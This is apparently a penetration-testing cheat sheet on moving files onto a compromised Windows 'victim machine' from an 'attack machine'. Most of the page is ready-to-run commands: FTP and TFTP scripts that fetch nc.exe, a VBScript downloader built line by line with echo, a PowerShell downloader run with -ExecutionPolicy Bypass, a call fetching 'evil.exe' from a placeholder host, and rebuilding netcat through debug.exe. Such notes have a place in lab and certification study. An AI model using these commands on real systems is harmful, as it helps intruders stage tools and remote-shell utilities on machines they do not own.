Windows basics

Transferring files

Why is this so much harder in Windows? I don't know.

FTP

Even though many Windows versions have FTP clients, we can't use them interactively because it will kill shells. But we can run multiple commands from a file and download them from an FTP server like pure-ftpdon the attack machine.
On the victim machine, echo the following commands into a file:
echo open [attack machine]> ftp.txt
echo bob>> ftp.txt
echo bob>> ftp.txt
echo binary>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt
Then run this command to connect:
ftp -s:ftp.txt

TFTP

TFTP is installed by default on Windows XP and Windows 2003. Kali also has a TFTP server:
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
With this command you can serve files from /srv/tftp.
From a Windows machine, use this to transfer files:
tftp -i [host] get nc.exe

VBScript

Here is a good script to make a wget-clone in VB (may need to be piped through unix2dos before copying it):
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
To execute:
cscript wget.vbs http://[hoste]/evil.exe evil.exe

Powershell

Powershell can't be started in a non-interactive shell. But this script can start it:
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://[host]/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
To execute:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Debug.exe

On windows 32 bit machines, it is possible to use debug.exe to transfer programs. It is used to inspect binaries, like a debugger, but can also rebuild them from hex. For example, a binary like nc.exe can be disassembled into hex, pasted into a file on the victim machine, and then assembled with debug.exe.
Debug.exe can only assemble 64 kb, use upx to compress the executable:
upx -9 nc.exe
To disassemble:
wine exe2bat.exe nc.exe nc.txt
Pasting that into the Windows shell will create nc.exe
Copy link
On this page
Transferring files
FTP
TFTP
VBScript
Powershell
Debug.exe